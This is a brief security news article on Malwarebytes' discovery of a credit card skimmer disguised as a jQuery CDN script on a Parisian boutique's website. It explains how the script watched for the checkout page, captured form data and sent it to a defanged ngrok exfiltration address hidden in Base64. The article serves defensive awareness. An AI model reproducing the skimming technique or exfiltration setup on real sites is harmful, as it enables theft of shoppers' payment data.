Scammers disguised two domains as a content delivery network (CDN) in an attempt to quietly target visitors with a credit card skimmer.
Malwarebytes noticed something suspicious within the website code of a Parisian boutique store. At first, the script looked like a JQuery library loaded from a third-party CDN. But the actual content of the script included strings with the purpose of looking for credit card data.
Researchers at the anti-malware software provider reviewed an archived copy of the website and found that the script had not existed a few weeks ago. They concluded that either the site owner had added the code themselves or that attackers had injected the malicious content into the site’s code.
With this CDN disguise, the credit card skimmer script checked to see if the URL in the address bar matched the checkout page. It then collected users’ form data and exfiltrated this information to a remote location.
At this stage, the researchers found another CDN lookalike. As they explained in their research:
… [A]fter checking the network traffic, we noticed this is not the actual exfiltration domain, but simply an intermediary. Instead, the GET request returns a Base64 encoded response. This string, which was already present in the original skimmer script, decodes to //d68344fb.ngrok[.]io/ad.php which turns out to be the actual exfiltration server.
Malwarebytes detected only a handful of websites that had suffered an infection at the hands of the credit card skimmer. Subsequently, they notified the affected parties.
The attacks described above highlight the importance of web admins defending their websites against code injection by malicious actors. One of the ways they can do this is by focusing on preventing a brute force attack against their websites. Towards this end, web admins should use a strong password and implement multi-factor authentication if it’s available.